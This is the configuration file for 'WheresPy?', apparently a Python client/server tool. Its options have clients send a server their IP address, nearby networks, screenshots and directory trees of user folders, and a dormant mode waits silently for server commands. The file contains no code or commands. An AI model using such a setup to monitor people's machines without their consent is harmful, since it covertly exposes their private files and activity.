# WheresPy? configuration file
# make sure all letters in variables are lowercase! otherwise they may not be registered.
# note: 'X' is used as placeholder value for variables
# this is so that setup.py will only replace values that are previously unchanged.

[general]
# default is y, this is toggled to n after setup.
# if this is set to y then the client will not run.
runsetup=n

[server]
serverip=X
serverport=X

[client] # note: client settings apply to all clients.
devicename=X
# frequency of sending information from clients (in seconds)
freq=X
# sendip (y,n) - send IP of clients in reports?
sendip=X
# sendnetworks (y,n) - send log of all available networks?
sendnetworks=X
# screenshot (y,n) - take screenshot?
screenshot=X
# dirspy (C:\...\...) - client will save a text file with a tree of this directory. be warned this can take a lot of space!
# set dirspy to "N" to disable this.
# note that if python tries to do this for folders it does not have access to (e.g. sys32) it will crash! you can use this for desktop, documents...
dirspy=C:\Users\
# dormant (on,off) - ON means client will remain connected to server but not send anything automatically.
# 'dormantserver.py' is available to control dormant clients which only send items when commanded to by the server.
# note: client will connect to the same IP/port for both dormant and active servers.
dormant=off
# protectencryptkey (y,n) - y means dormant mode will not be able to send filekey.key to server. this is on by default.
protectencryptkey=y